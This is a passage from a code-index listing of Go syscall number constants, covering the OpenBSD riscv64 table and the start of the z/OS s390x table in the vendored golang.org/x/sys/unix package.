211) | SYS_READLINKAT = 322 constant SYS_RENAMEAT (line 212) | SYS_RENAMEAT = 323 constant SYS_SYMLINKAT (line 213) | SYS_SYMLINKAT = 324 constant SYS_UNLINKAT (line 214) | SYS_UNLINKAT = 325 constant SYS___SET_TCB (line 215) | SYS___SET_TCB = 329 constant SYS___GET_TCB (line 216) | SYS___GET_TCB = 330 FILE: vendor/golang.org/x/sys/unix/zsysnum_openbsd_riscv64.go constant SYS_EXIT (line 10) | SYS_EXIT = 1 constant SYS_FORK (line 11) | SYS_FORK = 2 constant SYS_READ (line 12) | SYS_READ = 3 constant SYS_WRITE (line 13) | SYS_WRITE = 4 constant SYS_OPEN (line 14) | SYS_OPEN = 5 constant SYS_CLOSE (line 15) | SYS_CLOSE = 6 constant SYS_GETENTROPY (line 16) | SYS_GETENTROPY = 7 constant SYS___TFORK (line 17) | SYS___TFORK = 8 constant SYS_LINK (line 18) | SYS_LINK = 9 constant SYS_UNLINK (line 19) | SYS_UNLINK = 10 constant SYS_WAIT4 (line 20) | SYS_WAIT4 = 11 constant SYS_CHDIR (line 21) | SYS_CHDIR = 12 constant SYS_FCHDIR (line 22) | SYS_FCHDIR = 13 constant SYS_MKNOD (line 23) | SYS_MKNOD = 14 constant SYS_CHMOD (line 24) | SYS_CHMOD = 15 constant SYS_CHOWN (line 25) | SYS_CHOWN = 16 constant SYS_OBREAK (line 26) | SYS_OBREAK = 17 constant SYS_GETDTABLECOUNT (line 27) | SYS_GETDTABLECOUNT = 18 constant SYS_GETRUSAGE (line 28) | SYS_GETRUSAGE = 19 constant SYS_GETPID (line 29) | SYS_GETPID = 20 constant SYS_MOUNT (line 30) | SYS_MOUNT = 21 constant SYS_UNMOUNT (line 31) | SYS_UNMOUNT = 22 constant SYS_SETUID (line 32) | SYS_SETUID = 23 constant SYS_GETUID (line 33) | SYS_GETUID = 24 constant SYS_GETEUID (line 34) | SYS_GETEUID = 25 constant SYS_PTRACE (line 35) | SYS_PTRACE = 26 constant SYS_RECVMSG (line 36) | SYS_RECVMSG = 27 constant SYS_SENDMSG (line 37) | SYS_SENDMSG = 28 constant SYS_RECVFROM (line 38) | SYS_RECVFROM = 29 constant SYS_ACCEPT (line 39) | SYS_ACCEPT = 30 constant SYS_GETPEERNAME (line 40) | SYS_GETPEERNAME = 31 constant SYS_GETSOCKNAME (line 41) | SYS_GETSOCKNAME = 32 constant SYS_ACCESS (line 42) | SYS_ACCESS = 33 constant SYS_CHFLAGS (line 43) | SYS_CHFLAGS = 34 constant SYS_FCHFLAGS (line 44) | SYS_FCHFLAGS = 35 constant SYS_SYNC (line 45) | SYS_SYNC = 36 constant SYS_STAT (line 46) | SYS_STAT = 38 constant SYS_GETPPID (line 47) | SYS_GETPPID = 39 constant SYS_LSTAT (line 48) | SYS_LSTAT = 40 constant SYS_DUP (line 49) | SYS_DUP = 41 constant SYS_FSTATAT (line 50) | SYS_FSTATAT = 42 constant SYS_GETEGID (line 51) | SYS_GETEGID = 43 constant SYS_PROFIL (line 52) | SYS_PROFIL = 44 constant SYS_KTRACE (line 53) | SYS_KTRACE = 45 constant SYS_SIGACTION (line 54) | SYS_SIGACTION = 46 constant SYS_GETGID (line 55) | SYS_GETGID = 47 constant SYS_SIGPROCMASK (line 56) | SYS_SIGPROCMASK = 48 constant SYS_SETLOGIN (line 57) | SYS_SETLOGIN = 50 constant SYS_ACCT (line 58) | SYS_ACCT = 51 constant SYS_SIGPENDING (line 59) | SYS_SIGPENDING = 52 constant SYS_FSTAT (line 60) | SYS_FSTAT = 53 constant SYS_IOCTL (line 61) | SYS_IOCTL = 54 constant SYS_REBOOT (line 62) | SYS_REBOOT = 55 constant SYS_REVOKE (line 63) | SYS_REVOKE = 56 constant SYS_SYMLINK (line 64) | SYS_SYMLINK = 57 constant SYS_READLINK (line 65) | SYS_READLINK = 58 constant SYS_EXECVE (line 66) | SYS_EXECVE = 59 constant SYS_UMASK (line 67) | SYS_UMASK = 60 constant SYS_CHROOT (line 68) | SYS_CHROOT = 61 constant SYS_GETFSSTAT (line 69) | SYS_GETFSSTAT = 62 constant SYS_STATFS (line 70) | SYS_STATFS = 63 constant SYS_FSTATFS (line 71) | SYS_FSTATFS = 64 constant SYS_FHSTATFS (line 72) | SYS_FHSTATFS = 65 constant SYS_VFORK (line 73) | SYS_VFORK = 66 constant SYS_GETTIMEOFDAY (line 74) | SYS_GETTIMEOFDAY = 67 constant SYS_SETTIMEOFDAY (line 75) | SYS_SETTIMEOFDAY = 68 constant SYS_SETITIMER (line 76) | SYS_SETITIMER = 69 constant SYS_GETITIMER (line 77) | SYS_GETITIMER = 70 constant SYS_SELECT (line 78) | SYS_SELECT = 71 constant SYS_KEVENT (line 79) | SYS_KEVENT = 72 constant SYS_MUNMAP (line 80) | SYS_MUNMAP = 73 constant SYS_MPROTECT (line 81) | SYS_MPROTECT = 74 constant SYS_MADVISE (line 82) | SYS_MADVISE = 75 constant SYS_UTIMES (line 83) | SYS_UTIMES = 76 constant SYS_FUTIMES (line 84) | SYS_FUTIMES = 77 constant SYS_GETGROUPS (line 85) | SYS_GETGROUPS = 79 constant SYS_SETGROUPS (line 86) | SYS_SETGROUPS = 80 constant SYS_GETPGRP (line 87) | SYS_GETPGRP = 81 constant SYS_SETPGID (line 88) | SYS_SETPGID = 82 constant SYS_FUTEX (line 89) | SYS_FUTEX = 83 constant SYS_UTIMENSAT (line 90) | SYS_UTIMENSAT = 84 constant SYS_FUTIMENS (line 91) | SYS_FUTIMENS = 85 constant SYS_KBIND (line 92) | SYS_KBIND = 86 constant SYS_CLOCK_GETTIME (line 93) | SYS_CLOCK_GETTIME = 87 constant SYS_CLOCK_SETTIME (line 94) | SYS_CLOCK_SETTIME = 88 constant SYS_CLOCK_GETRES (line 95) | SYS_CLOCK_GETRES = 89 constant SYS_DUP2 (line 96) | SYS_DUP2 = 90 constant SYS_NANOSLEEP (line 97) | SYS_NANOSLEEP = 91 constant SYS_FCNTL (line 98) | SYS_FCNTL = 92 constant SYS_ACCEPT4 (line 99) | SYS_ACCEPT4 = 93 constant SYS___THRSLEEP (line 100) | SYS___THRSLEEP = 94 constant SYS_FSYNC (line 101) | SYS_FSYNC = 95 constant SYS_SETPRIORITY (line 102) | SYS_SETPRIORITY = 96 constant SYS_SOCKET (line 103) | SYS_SOCKET = 97 constant SYS_CONNECT (line 104) | SYS_CONNECT = 98 constant SYS_GETDENTS (line 105) | SYS_GETDENTS = 99 constant SYS_GETPRIORITY (line 106) | SYS_GETPRIORITY = 100 constant SYS_PIPE2 (line 107) | SYS_PIPE2 = 101 constant SYS_DUP3 (line 108) | SYS_DUP3 = 102 constant SYS_SIGRETURN (line 109) | SYS_SIGRETURN = 103 constant SYS_BIND (line 110) | SYS_BIND = 104 constant SYS_SETSOCKOPT (line 111) | SYS_SETSOCKOPT = 105 constant SYS_LISTEN (line 112) | SYS_LISTEN = 106 constant SYS_CHFLAGSAT (line 113) | SYS_CHFLAGSAT = 107 constant SYS_PLEDGE (line 114) | SYS_PLEDGE = 108 constant SYS_PPOLL (line 115) | SYS_PPOLL = 109 constant SYS_PSELECT (line 116) | SYS_PSELECT = 110 constant SYS_SIGSUSPEND (line 117) | SYS_SIGSUSPEND = 111 constant SYS_SENDSYSLOG (line 118) | SYS_SENDSYSLOG = 112 constant SYS_UNVEIL (line 119) | SYS_UNVEIL = 114 constant SYS_GETSOCKOPT (line 120) | SYS_GETSOCKOPT = 118 constant SYS_THRKILL (line 121) | SYS_THRKILL = 119 constant SYS_READV (line 122) | SYS_READV = 120 constant SYS_WRITEV (line 123) | SYS_WRITEV = 121 constant SYS_KILL (line 124) | SYS_KILL = 122 constant SYS_FCHOWN (line 125) | SYS_FCHOWN = 123 constant SYS_FCHMOD (line 126) | SYS_FCHMOD = 124 constant SYS_SETREUID (line 127) | SYS_SETREUID = 126 constant SYS_SETREGID (line 128) | SYS_SETREGID = 127 constant SYS_RENAME (line 129) | SYS_RENAME = 128 constant SYS_FLOCK (line 130) | SYS_FLOCK = 131 constant SYS_MKFIFO (line 131) | SYS_MKFIFO = 132 constant SYS_SENDTO (line 132) | SYS_SENDTO = 133 constant SYS_SHUTDOWN (line 133) | SYS_SHUTDOWN = 134 constant SYS_SOCKETPAIR (line 134) | SYS_SOCKETPAIR = 135 constant SYS_MKDIR (line 135) | SYS_MKDIR = 136 constant SYS_RMDIR (line 136) | SYS_RMDIR = 137 constant SYS_ADJTIME (line 137) | SYS_ADJTIME = 140 constant SYS_GETLOGIN_R (line 138) | SYS_GETLOGIN_R = 141 constant SYS_SETSID (line 139) | SYS_SETSID = 147 constant SYS_QUOTACTL (line 140) | SYS_QUOTACTL = 148 constant SYS_NFSSVC (line 141) | SYS_NFSSVC = 155 constant SYS_GETFH (line 142) | SYS_GETFH = 161 constant SYS_SYSARCH (line 143) | SYS_SYSARCH = 165 constant SYS_PREAD (line 144) | SYS_PREAD = 173 constant SYS_PWRITE (line 145) | SYS_PWRITE = 174 constant SYS_SETGID (line 146) | SYS_SETGID = 181 constant SYS_SETEGID (line 147) | SYS_SETEGID = 182 constant SYS_SETEUID (line 148) | SYS_SETEUID = 183 constant SYS_PATHCONF (line 149) | SYS_PATHCONF = 191 constant SYS_FPATHCONF (line 150) | SYS_FPATHCONF = 192 constant SYS_SWAPCTL (line 151) | SYS_SWAPCTL = 193 constant SYS_GETRLIMIT (line 152) | SYS_GETRLIMIT = 194 constant SYS_SETRLIMIT (line 153) | SYS_SETRLIMIT = 195 constant SYS_MMAP (line 154) | SYS_MMAP = 197 constant SYS_LSEEK (line 155) | SYS_LSEEK = 199 constant SYS_TRUNCATE (line 156) | SYS_TRUNCATE = 200 constant SYS_FTRUNCATE (line 157) | SYS_FTRUNCATE = 201 constant SYS_SYSCTL (line 158) | SYS_SYSCTL = 202 constant SYS_MLOCK (line 159) | SYS_MLOCK = 203 constant SYS_MUNLOCK (line 160) | SYS_MUNLOCK = 204 constant SYS_GETPGID (line 161) | SYS_GETPGID = 207 constant SYS_UTRACE (line 162) | SYS_UTRACE = 209 constant SYS_SEMGET (line 163) | SYS_SEMGET = 221 constant SYS_MSGGET (line 164) | SYS_MSGGET = 225 constant SYS_MSGSND (line 165) | SYS_MSGSND = 226 constant SYS_MSGRCV (line 166) | SYS_MSGRCV = 227 constant SYS_SHMAT (line 167) | SYS_SHMAT = 228 constant SYS_SHMDT (line 168) | SYS_SHMDT = 230 constant SYS_MINHERIT (line 169) | SYS_MINHERIT = 250 constant SYS_POLL (line 170) | SYS_POLL = 252 constant SYS_ISSETUGID (line 171) | SYS_ISSETUGID = 253 constant SYS_LCHOWN (line 172) | SYS_LCHOWN = 254 constant SYS_GETSID (line 173) | SYS_GETSID = 255 constant SYS_MSYNC (line 174) | SYS_MSYNC = 256 constant SYS_PIPE (line 175) | SYS_PIPE = 263 constant SYS_FHOPEN (line 176) | SYS_FHOPEN = 264 constant SYS_PREADV (line 177) | SYS_PREADV = 267 constant SYS_PWRITEV (line 178) | SYS_PWRITEV = 268 constant SYS_KQUEUE (line 179) | SYS_KQUEUE = 269 constant SYS_MLOCKALL (line 180) | SYS_MLOCKALL = 271 constant SYS_MUNLOCKALL (line 181) | SYS_MUNLOCKALL = 272 constant SYS_GETRESUID (line 182) | SYS_GETRESUID = 281 constant SYS_SETRESUID (line 183) | SYS_SETRESUID = 282 constant SYS_GETRESGID (line 184) | SYS_GETRESGID = 283 constant SYS_SETRESGID (line 185) | SYS_SETRESGID = 284 constant SYS_MQUERY (line 186) | SYS_MQUERY = 286 constant SYS_CLOSEFROM (line 187) | SYS_CLOSEFROM = 287 constant SYS_SIGALTSTACK (line 188) | SYS_SIGALTSTACK = 288 constant SYS_SHMGET (line 189) | SYS_SHMGET = 289 constant SYS_SEMOP (line 190) | SYS_SEMOP = 290 constant SYS_FHSTAT (line 191) | SYS_FHSTAT = 294 constant SYS___SEMCTL (line 192) | SYS___SEMCTL = 295 constant SYS_SHMCTL (line 193) | SYS_SHMCTL = 296 constant SYS_MSGCTL (line 194) | SYS_MSGCTL = 297 constant SYS_SCHED_YIELD (line 195) | SYS_SCHED_YIELD = 298 constant SYS_GETTHRID (line 196) | SYS_GETTHRID = 299 constant SYS___THRWAKEUP (line 197) | SYS___THRWAKEUP = 301 constant SYS___THREXIT (line 198) | SYS___THREXIT = 302 constant SYS___THRSIGDIVERT (line 199) | SYS___THRSIGDIVERT = 303 constant SYS___GETCWD (line 200) | SYS___GETCWD = 304 constant SYS_ADJFREQ (line 201) | SYS_ADJFREQ = 305 constant SYS_SETRTABLE (line 202) | SYS_SETRTABLE = 310 constant SYS_GETRTABLE (line 203) | SYS_GETRTABLE = 311 constant SYS_FACCESSAT (line 204) | SYS_FACCESSAT = 313 constant SYS_FCHMODAT (line 205) | SYS_FCHMODAT = 314 constant SYS_FCHOWNAT (line 206) | SYS_FCHOWNAT = 315 constant SYS_LINKAT (line 207) | SYS_LINKAT = 317 constant SYS_MKDIRAT (line 208) | SYS_MKDIRAT = 318 constant SYS_MKFIFOAT (line 209) | SYS_MKFIFOAT = 319 constant SYS_MKNODAT (line 210) | SYS_MKNODAT = 320 constant SYS_OPENAT (line 211) | SYS_OPENAT = 321 constant SYS_READLINKAT (line 212) | SYS_READLINKAT = 322 constant SYS_RENAMEAT (line 213) | SYS_RENAMEAT = 323 constant SYS_SYMLINKAT (line 214) | SYS_SYMLINKAT = 324 constant SYS_UNLINKAT (line 215) | SYS_UNLINKAT = 325 constant SYS___SET_TCB (line 216) | SYS___SET_TCB = 329 constant SYS___GET_TCB (line 217) | SYS___GET_TCB = 330 FILE: vendor/golang.org/x/sys/unix/zsysnum_zos_s390x.go constant SYS_ACOSD128 (line 12) | SYS_ACOSD128 = 0xB80 constant SYS_ACOSD32 (line 13) | SYS_ACOSD32 = 0xB7E constant SYS_ACOSD64 (line 14) | SYS_ACOSD64 = 0xB7F constant SYS_ACOSHD128 (line 15) | SYS_ACOSHD128 = 0xB83 constant SYS_ACOSHD32 (line 16) | SYS_ACOSHD32 = 0xB81 constant SYS_ACOSHD64 (line 17) | SYS_ACOSHD64 = 0xB82 constant SYS_AIO_FSYNC (line 18) | SYS_AIO_FSYNC = 0xC69 constant SYS_ASCTIME (line 19) | SYS_ASCTIME = 0x0AE constant SYS_ASCTIME64 (line 20) | SYS_ASCTIME64 = 0xCD7 constant SYS_ASCTIME64_R (line 21) | SYS_ASCTIME64_R = 0xCD8 constant SYS_ASIND128 (line 22) | SYS_ASIND128 = 0xB86 constant SYS_ASIND32 (line 23) | SYS_ASIND32 = 0xB84 constant SYS_ASIND64 (line 24) | SYS_ASIND64 = 0xB85 constant SYS_ASINHD128 (line 25) | SYS_ASINHD128 = 0xB89 constant SYS_ASINHD32 (line 26) | SYS_ASINHD32 = 0xB87 constant SYS_ASINHD64 (line 27) | SYS_ASINHD64 = 0xB88 constant SYS_ATAN2D128 (line 28) | SYS_ATAN2D128 = 0xB8F constant SYS_ATAN2D32 (line 29) | SYS_ATAN2D32 = 0xB8D constant SYS_ATAN2D64 (line 30) | SYS_ATAN2D64 = 0xB8E constant SYS_ATAND128 (line 31) | SYS_ATAND128 = 0xB8C constant SYS_ATAND32 (line 32) | SYS_ATAND32 = 0xB8A constant SYS_ATAND64 (line 33) | SYS_ATAND64 = 0xB8B constant SYS_ATANHD128 (line 34) | SYS_ATANHD128 = 0xB92 constant SYS_ATANHD32 (line 35) | SYS_ATANHD32 = 0xB90 constant SYS_ATANHD64 (line 36) | SYS_ATANHD64 = 0xB91 constant SYS_BIND2ADDRSEL (line 37) | SYS_BIND2ADDRSEL = 0xD59 constant SYS_C16RTOMB (line 38) | SYS_C16RTOMB = 0xD40 constant SYS_C32RTOMB (line 39) | SYS_C32RTOMB = 0xD41 constant SYS_CBRTD128 (line 40) | SYS_CBRTD128 = 0xB95 constant SYS_CBRTD32 (line 41) | SYS_CBRTD32 = 0xB93 constant SYS_CBRTD64 (line 42) | SYS_CBRTD64 = 0xB94 constant SYS_CEILD128 (line 43) | SYS_CEILD128 = 0xB98 constant SYS_CEILD32 (line 44) | SYS_CEILD32 = 0xB96 constant SYS_CEILD64 (line 45) | SYS_CEILD64 = 0xB97 constant SYS_CLEARENV (line 46) | SYS_CLEARENV = 0x0C9 constant SYS_CLEARERR_UNLOCKED (line 47) | SYS_CLEARERR_UNLOCKED = 0xCA1 constant SYS_CLOCK (line 48) | SYS_CLOCK = 0x0AA constant SYS_CLOGL (line 49) | SYS_CLOGL = 0xA00 constant SYS_CLRMEMF (line 50) | SYS_CLRMEMF = 0x0BD constant SYS_CONJ (line 51) | SYS_CONJ = 0xA03 constant SYS_CONJF (line 52) | SYS_CONJF = 0xA06 constant SYS_CONJL (line 53) | SYS_CONJL = 0xA09 constant SYS_COPYSIGND128 (line 54) | SYS_COPYSIGND128 = 0xB9E constant SYS_COPYSIGND32 (line 55) | SYS_COPYSIGND32 = 0xB9C constant SYS_COPYSIGND64 (line 56) | SYS_COPYSIGND64 = 0xB9D constant SYS_COSD128 (line 57) | SYS_COSD128 = 0xBA1 constant SYS_COSD32 (line 58) | SYS_COSD32 = 0xB9F constant SYS_COSD64 (line 59) | SYS_COSD64 = 0xBA0 constant SYS_COSHD128 (line 60) | SYS_COSHD128 = 0xBA4 constant SYS_COSHD32 (line 61) | SYS_COSHD32 = 0xBA2 constant SYS_COSHD64 (line 62) | SYS_COSHD64 = 0xBA3 constant SYS_CPOW (line 63) | SYS_CPOW = 0xA0C constant SYS_CPOWF (line 64) | SYS_CPOWF = 0xA0F constant SYS_CPOWL (line 65) | SYS_CPOWL = 0xA12 constant SYS_CPROJ (line 66) | SYS_CPROJ = 0xA15 constant SYS_CPROJF (line 67) | SYS_CPROJF = 0xA18 constant SYS_CPROJL (line 68) | SYS_CPROJL = 0xA1B constant SYS_CREAL (line 69) | SYS_CREAL = 0xA1E constant SYS_CREALF (line 70) | SYS_CREALF = 0xA21 constant SYS_CREALL (line 71) | SYS_CREALL = 0xA24 constant SYS_CSIN (line 72) | SYS_CSIN = 0xA27 constant SYS_CSINF (line 73) | SYS_CSINF = 0xA2A constant SYS_CSINH (line 74) | SYS_CSINH = 0xA30 constant SYS_CSINHF (line 75) | SYS_CSINHF = 0xA33 constant SYS_CSINHL (line 76) | SYS_CSINHL = 0xA36 constant SYS_CSINL (line 77) | SYS_CSINL = 0xA2D constant SYS_CSNAP (line 78) | SYS_CSNAP = 0x0C5 constant SYS_CSQRT (line 79) | SYS_CSQRT = 0xA39 constant SYS_CSQRTF (line 80) | SYS_CSQRTF = 0xA3C constant SYS_CSQRTL (line 81) | SYS_CSQRTL = 0xA3F constant SYS_CTAN (line 82) | SYS_CTAN = 0xA42 constant SYS_CTANF (line 83) | SYS_CTANF = 0xA45 constant SYS_CTANH (line 84) | SYS_CTANH = 0xA4B constant SYS_CTANHF (line 85) | SYS_CTANHF = 0xA4E constant SYS_CTANHL (line 86) | SYS_CTANHL = 0xA51 constant SYS_CTANL (line 87) | SYS_CTANL = 0xA48 constant SYS_CTIME (line 88) | SYS_CTIME = 0x0AB constant SYS_CTIME64 (line 89) | SYS_CTIME64 = 0xCD9 constant SYS_CTIME64_R (line 90) | SYS_CTIME64_R = 0xCDA constant SYS_CTRACE (line 91) | SYS_CTRACE = 0x0C6 constant SYS_DIFFTIME (line 92) | SYS_DIFFTIME = 0x0A7 constant SYS_DIFFTIME64 (line 93) | SYS_DIFFTIME64 = 0xCDB constant SYS_DLADDR (line 94) | SYS_DLADDR = 0xC82 constant SYS_DYNALLOC (line 95) | SYS_DYNALLOC = 0x0C3 constant SYS_DYNFREE (line 96) | SYS_DYNFREE = 0x0C2 constant SYS_ERFCD128 (line 97) | SYS_ERFCD128 = 0xBAA constant SYS_ERFCD32 (line 98) | SYS_ERFCD32 = 0xBA8 constant SYS_ERFCD64 (line 99) | SYS_ERFCD64 = 0xBA9 constant SYS_ERFD128 (line 100) | SYS_ERFD128 = 0xBA7 constant SYS_ERFD32 (line 101) | SYS_ERFD32 = 0xBA5 constant SYS_ERFD64 (line 102) | SYS_ERFD64 = 0xBA6 constant SYS_EXP2D128 (line 103) | SYS_EXP2D128 = 0xBB0 constant SYS_EXP2D32 (line 104) | SYS_EXP2D32 = 0xBAE constant SYS_EXP2D64 (line 105) | SYS_EXP2D64 = 0xBAF constant SYS_EXPD128 (line 106) | SYS_EXPD128 = 0xBAD constant SYS_EXPD32 (line 107) | SYS_EXPD32 = 0xBAB constant SYS_EXPD64 (line 108) | SYS_EXPD64 = 0xBAC constant SYS_EXPM1D128 (line 109) | SYS_EXPM1D128 = 0xBB3 constant SYS_EXPM1D32 (line 110) | SYS_EXPM1D32 = 0xBB1 constant SYS_EXPM1D64 (line 111) | SYS_EXPM1D64 = 0xBB2 constant SYS_FABSD128 (line 112) | SYS_FABSD128 = 0xBB6 constant SYS_FABSD32 (line 113) | SYS_FABSD32 = 0xBB4 constant SYS_FABSD64 (line 114) | SYS_FABSD64 = 0xBB5 constant SYS_FDELREC_UNLOCKED (line 115) | SYS_FDELREC_UNLOCKED = 0xCA2 constant SYS_FDIMD128 (line 116) | SYS_FDIMD128 = 0xBB9 constant SYS_FDIMD32 (line 117) | SYS_FDIMD32 = 0xBB7 constant SYS_FDIMD64 (line 118) | SYS_FDIMD64 = 0xBB8 constant SYS_FDOPEN_UNLOCKED (line 119) | SYS_FDOPEN_UNLOCKED = 0xCFC constant SYS_FECLEAREXCEPT (line 120) | SYS_FECLEAREXCEPT = 0xAEA constant SYS_FEGETENV (line 121) | SYS_FEGETENV = 0xAEB constant SYS_FEGETEXCEPTFLAG (line 122) | SYS_FEGETEXCEPTFLAG = 0xAEC constant SYS_FEGETROUND (line 123) | SYS_FEGETROUND = 0xAED constant SYS_FEHOLDEXCEPT (line 124) | SYS_FEHOLDEXCEPT = 0xAEE constant SYS_FEOF_UNLOCKED (line 125) | SYS_FEOF_UNLOCKED = 0xCA3 constant SYS_FERAISEEXCEPT (line 126) | SYS_FERAISEEXCEPT = 0xAEF constant SYS_FERROR_UNLOCKED (line 127) | SYS_FERROR_UNLOCKED = 0xCA4 constant SYS_FESETENV (line 128) | SYS_FESETENV = 0xAF0 constant SYS_FESETEXCEPTFLAG (line 129) | SYS_FESETEXCEPTFLAG = 0xAF1 constant SYS_FESETROUND (line 130) | SYS_FESETROUND = 0xAF2 constant SYS_FETCHEP (line 131) | SYS_FETCHEP = 0x0BF constant SYS_FETESTEXCEPT (line 132) | SYS_FETESTEXCEPT = 0xAF3 constant SYS_FEUPDATEENV (line 133) | SYS_FEUPDATEENV = 0xAF4 constant SYS_FE_DEC_GETROUND (line 134) | SYS_FE_DEC_GETROUND = 0xBBA constant SYS_FE_DEC_SETROUND (line 135) | SYS_FE_DEC_SETROUND = 0xBBB constant SYS_FFLUSH_UNLOCKED (line 136) | SYS_FFLUSH_UNLOCKED = 0xCA5 constant SYS_FGETC_UNLOCKED (line 137) | SYS_FGETC_UNLOCKED = 0xC80 constant SYS_FGETPOS64 (line 138) | SYS_FGETPOS64 = 0xCEE constant SYS_FGETPOS64_UNLOCKED (line 139) | SYS_FGETPOS64_UNLOCKED = 0xCF4 constant SYS_FGETPOS_UNLOCKED (line 140) | SYS_FGETPOS_UNLOCKED = 0xCA6 constant SYS_FGETS_UNLOCKED (line 141) | SYS_FGETS_UNLOCKED = 0xC7C constant SYS_FGETWC_UNLOCKED (line 142) | SYS_FGETWC_UNLOCKED = 0xCA7 constant SYS_FGETWS_UNLOCKED (line 143) | SYS_FGETWS_UNLOCKED = 0xCA8 constant SYS_FILENO_UNLOCKED (line 144) | SYS_FILENO_UNLOCKED = 0xCA9 constant SYS_FLDATA (line 145) | SYS_FLDATA = 0x0C1 constant SYS_FLDATA_UNLOCKED (line 146) | SYS_FLDATA_UNLOCKED = 0xCAA constant SYS_FLOCATE_UNLOCKED (line 147) | SYS_FLOCATE_UNLOCKED = 0xCAB constant SYS_FLOORD128 (line 148) | SYS_FLOORD128 = 0xBBE constant SYS_FLOORD32 (line 149) | SYS_FLOORD32 = 0xBBC constant SYS_FLOORD64 (line 150) | SYS_FLOORD64 = 0xBBD constant SYS_FMA (line 151) | SYS_FMA = 0xA63 constant SYS_FMAD128 (line 152) | SYS_FMAD128 = 0xBC1 constant SYS_FMAD32 (line 153) | SYS_FMAD32 = 0xBBF constant SYS_FMAD64 (line 154) | SYS_FMAD64 = 0xBC0 constant SYS_FMAF (line 155) | SYS_FMAF = 0xA66 constant SYS_FMAL (line 156) | SYS_FMAL = 0xA69 constant SYS_FMAX (line 157) | SYS_FMAX = 0xA6C constant SYS_FMAXD128 (line 158) | SYS_FMAXD128 = 0xBC4 constant SYS_FMAXD32 (line 159) | SYS_FMAXD32 = 0xBC2 constant SYS_FMAXD64 (line 160) | SYS_FMAXD64 = 0xBC3 constant SYS_FMAXF (line 161) | SYS_FMAXF = 0xA6F constant SYS_FMAXL (line 162) | SYS_FMAXL = 0xA72 constant SYS_FMIN (line 163) | SYS_FMIN = 0xA75 constant SYS_FMIND128 (line 164) | SYS_FMIND128 = 0xBC7 constant SYS_FMIND32 (line 165) | SYS_FMIND32 = 0xBC5 constant SYS_FMIND64 (line 166) | SYS_FMIND64 = 0xBC6 constant SYS_FMINF (line 167) | SYS_FMINF = 0xA78 constant SYS_FMINL (line 168) | SYS_FMINL = 0xA7B constant SYS_FMODD128 (line 169) | SYS_FMODD128 = 0xBCA constant SYS_FMODD32 (line 170) | SYS_FMODD32 = 0xBC8 constant SYS_FMODD64 (line 171) | SYS_FMODD64 = 0xBC9 constant SYS_FOPEN64 (line 172) | SYS_FOPEN64 = 0xD49 constant SYS_FOPEN64_UNLOCKED (line 173) | SYS_FOPEN64_UNLOCKED = 0xD4A constant SYS_FOPEN_UNLOCKED (line 174) | SYS_FOPEN_UNLOCKED = 0xCFA constant SYS_FPRINTF_UNLOCKED (line 175) | SYS_FPRINTF_UNLOCKED = 0xCAC constant SYS_FPUTC_UNLOCKED (line 176) | SYS_FPUTC_UNLOCKED = 0xC81 constant SYS_FPUTS_UNLOCKED (line 177) | SYS_FPUTS_UNLOCKED = 0xC7E constant SYS_FPUTWC_UNLOCKED (line 178) | SYS_FPUTWC_UNLOCKED = 0xCAD constant SYS_FPUTWS_UNLOCKED (line 179) | SYS_FPUTWS_UNLOCKED = 0xCAE constant SYS_FREAD_NOUPDATE (line 180) | SYS_FREAD_NOUPDATE = 0xCEC constant SYS_FREAD_NOUPDATE_UNLOCKED (line 181) | SYS_FREAD_NOUPDATE_UNLOCKED = 0xCED constant SYS_FREAD_UNLOCKED (line 182) | SYS_FREAD_UNLOCKED = 0xC7B constant SYS_FREEIFADDRS (line 183) | SYS_FREEIFADDRS = 0xCE6 constant SYS_FREOPEN64 (line 184) | SYS_FREOPEN64 = 0xD4B constant SYS_FREOPEN64_UNLOCKED (line 185) | SYS_FREOPEN64_UNLOCKED = 0xD4C constant SYS_FREOPEN_UNLOCKED (line 186) | SYS_FREOPEN_UNLOCKED = 0xCFB constant SYS_FREXPD128 (line 187) | SYS_FREXPD128 = 0xBCE constant SYS_FREXPD32 (line 188) | SYS_FREXPD32 = 0xBCC constant SYS_FREXPD64 (line 189) | SYS_FREXPD64 = 0xBCD constant SYS_FSCANF_UNLOCKED (line 190) | SYS_FSCANF_UNLOCKED = 0xCAF constant SYS_FSEEK64 (line 191) | SYS_FSEEK64 = 0xCEF constant SYS_FSEEK64_UNLOCKED (line 192) | SYS_FSEEK64_UNLOCKED = 0xCF5 constant SYS_FSEEKO64 (line 193) | SYS_FSEEKO64 = 0xCF0 constant SYS_FSEEKO64_UNLOCKED (line 194) | SYS_FSEEKO64_UNLOCKED = 0xCF6 constant SYS_FSEEKO_UNLOCKED (line 195) | SYS_FSEEKO_UNLOCKED = 0xCB1 constant SYS_FSEEK_UNLOCKED (line 196) | SYS_FSEEK_UNLOCKED = 0xCB0 constant SYS_FSETPOS64 (line 197) | SYS_FSETPOS64 = 0xCF1 constant SYS_FSETPOS64_UNLOCKED (line 198) | SYS_FSETPOS64_UNLOCKED = 0xCF7 constant SYS_FSETPOS_UNLOCKED (line 199) | SYS_FSETPOS_UNLOCKED = 0xCB3 constant SYS_FTELL64 (line 200) | SYS_FTELL64 = 0xCF2 constant SYS_FTELL64_UNLOCKED (line 201) | SYS_FTELL64_UNLOCKED = 0xCF8 constant SYS_FTELLO64 (line 202) | SYS_FTELLO64 = 0xCF3 constant SYS_FTELLO64_UNLOCKED (line 203) | SYS_FTELLO64_UNLOCKED = 0xCF9 constant SYS_FTELLO_UNLOCKED (line 204) | SYS_FTELLO_UNLOCKED = 0xCB5 constant SYS_FTELL_UNLOCKED (line 205) | SYS_FTELL_UNLOCKED = 0xCB4 constant SYS_FUPDATE (line 206) | SYS_FUPDATE = 0x0B5 constant SYS_FUPDATE_UNLOCKED (line 207) | SYS_FUPDATE_UNLOCKED = 0xCB7 constant SYS_FWIDE_UNLOCKED (line 208) | SYS_FWIDE_UNLOCKED = 0xCB8 constant SYS_FWPRINTF_UNLOCKED (line 209) | SYS_FWPRINTF_UNLOCKED = 0xCB9 constant SYS_FWRITE_UNLOCKED (line 210) | SYS_FWRITE_UNLOCKED = 0xC7A constant SYS_FWSCANF_UNLOCKED (line 211) | SYS_FWSCANF_UNLOCKED = 0xCBA constant SYS_GETDATE64 (line 212) | SYS_GETDATE64 = 0xD4F constant SYS_GETIFADDRS (line 213) | SYS_GETIFADDRS = 0xCE7 constant SYS_GETIPV4SOURCEFILTER (line 214) | SYS_GETIPV4SOURCEFILTER = 0xC77 constant SYS_GETSOURCEFILTER (line 215) | SYS_GETSOURCEFILTER = 0xC79 constant SYS_GETSYNTX (line 216) | SYS_GETSYNTX = 0x0FD constant SYS_GETS_UNLOCKED (line 217) | 